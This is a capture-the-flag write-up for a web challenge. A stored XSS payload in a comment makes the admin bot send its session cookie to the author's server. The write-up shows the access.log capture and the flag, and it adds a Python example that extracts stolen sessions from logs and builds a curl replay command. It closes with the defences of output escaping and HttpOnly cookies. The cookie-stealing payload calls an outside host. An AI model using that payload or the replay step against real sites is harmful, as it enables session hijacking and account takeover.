Tags: web 

Rating:

So, we are on a page where visitors can leave comments on the site, and the goal is to log in as admin. Let me think... I'd bet it's an XSS challenge, but let's do some searching first.



We found at least two more pages: admin.php and login.php.



We try a simple XSS payload in the comments section (an image whose load fails, so the onerror handler fires and sends the visitor's cookies to our server):

<img src="bla" onerror="window.location='http://blakl.is/'+document.cookie;">


And bingo! I receive a cookie from a PhantomJS user (the challenge's headless browser, visiting the comment page as admin) in my webserver's access.log:

213.233.185.27 - - [05/Feb/2016:14:36:46 +0000] "GET /PHPSESSID=515386866780b5f132fc96c02b3ddb82 HTTP/1.1" 404 492 "http://172.17.118.91:8083/privateindex.php?id=sec0d" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"


Just set this PHPSESSID cookie in your browser and browse to admin.php to get the flag: dcfda075814e72c8a206e115914fd50b
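Here is an added example, not part of the original writeup, that walks the same chain end to end in Python: the payload (with the spaces that defanged it removed), the rendering bug it relies on beside the escaped form, a parser that pulls the stolen session out of the attacker's access.log, and the Cookie header used to replay it. The vulnerable/safe render functions are an assumption of what the challenge's PHP does (its source is not shown); the second log line, the `theme` cookie and the `HttpOnly` check are constructed, and only the first log line and its session id come from the writeup.

```python
import html
import re
from urllib.parse import unquote

# Stored-XSS payload from the writeup, as a real <img> tag.
# blakl.is is the author's logging host.
PAYLOAD = (
    "<img src=\"bla\" "
    "onerror=\"window.location='http://blakl.is/'+document.cookie;\">"
)

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log: the first line is the hit captured in the writeup,
# the second is ordinary noise so the filter has something to ignore.
SAMPLE_LOG = (
    '213.233.185.27 - - [05/Feb/2016:14:36:46 +0000] '
    '"GET /PHPSESSID=515386866780b5f132fc96c02b3ddb82 HTTP/1.1" 404 492 '
    '"http://172.17.118.91:8083/privateindex.php?id=sec0d" '
    '"Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) '
    'PhantomJS/1.9.0 Safari/534.34"\n'
    '10.0.0.7 - - [05/Feb/2016:14:37:02 +0000] "GET /index.html HTTP/1.1" 200 1024 '
    '"-" "curl/7.47.0"\n'
)


def render_comment_vulnerable(comment):
    """Assumed challenge behaviour: the comment is echoed into the page as-is."""
    return "<p>" + comment + "</p>"


def render_comment_safe(comment):
    """The fix: HTML-escape user input before it reaches the page."""
    return "<p>" + html.escape(comment, quote=True) + "</p>"


def script_visible_cookies(set_cookie_headers):
    """Simulate what document.cookie exposes for a list of Set-Cookie values.
    Cookies flagged HttpOnly are never readable from script, so a session
    cookie set that way could not be stolen by the payload above."""
    visible = {}
    for header in set_cookie_headers:
        parts = [p.strip() for p in header.split(";")]
        name, _, value = parts[0].partition("=")
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        if "httponly" not in attrs:
            visible[name] = value
    return visible


def parse_cookie_path(path):
    """Turn the request path '/name=value; name2=value2' (URL-encoded by the
    victim browser when it navigated to host/<document.cookie>) into a dict."""
    cookies = {}
    for part in unquote(path.lstrip("/")).split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def exfiltrated_sessions(log_text, ua_marker="PhantomJS"):
    """Scan access.log text for hits from the challenge's headless browser
    whose request path carries cookies; return one record per hit."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or ua_marker not in m.group("ua"):
            continue
        cookies = parse_cookie_path(m.group("path"))
        if cookies:
            hits.append({"ip": m.group("ip"),
                         "referer": m.group("referer"),
                         "cookies": cookies})
    return hits


def cookie_header(cookies):
    """Build the Cookie request header value used to replay the stolen session."""
    return "; ".join(f"{k}={v}" for k, v in cookies.items())


if __name__ == "__main__":
    for hit in exfiltrated_sessions(SAMPLE_LOG):
        print(f"{hit['ip']} came from {hit['referer']}")
        print("replay with: curl -b '" + cookie_header(hit["cookies"])
              + "' http://172.17.118.91:8083/admin.php")
```

The replay is the last step of the writeup: `curl -b 'PHPSESSID=515386866780b5f132fc96c02b3ddb82' http://172.17.118.91:8083/admin.php` (or the same cookie set in a browser). Two things would have broken this chain on the defender's side: escaping the comment before rendering it, and setting the session cookie with `HttpOnly`, which keeps it out of `document.cookie` even when the XSS itself still fires.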